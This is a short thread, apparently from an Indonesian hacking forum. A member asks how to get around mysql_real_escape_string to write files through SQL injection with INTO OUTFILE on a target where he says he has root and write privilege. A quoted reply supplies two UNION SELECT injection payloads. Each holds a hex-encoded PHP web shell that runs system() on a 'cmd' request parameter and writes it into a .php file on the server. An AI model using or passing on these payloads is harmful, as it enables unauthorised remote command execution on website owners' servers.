Posts: 103
Threads: 8
Joined: May 2013
Ane mau tanya nih bypass mysql_real_escape_string untuk outfile
Pertama ane check user dulu sama file_privelege. Hasilnya root dan memiliki akses write file
Nah, pas ane coba upload malah kayak gini. Pathnya ane hex karena kan karakter ' di filter
Mohon pencerahannya brother, ane masih belajar.
Jika kamu tidak sanggup menanggung lelahnya belajar, maka kamu akan menanggung perihnya kebodohan (Imam Syafii)
Posts: 103
Threads: 8
Joined: May 2013
(09-13-2015, 01:06 AM)Guest Wrote: try dis ;
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/here/lol.php'--+-
or ;
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/on/hex/here/lol.php'--+
But, mysql_real_escape_string will addslash every single quotes. Example : INTO OUTFILE '/path' will become INTO OUTFILE \'/path\' . So, it wont work
Jika kamu tidak sanggup menanggung lelahnya belajar, maka kamu akan menanggung perihnya kebodohan (Imam Syafii)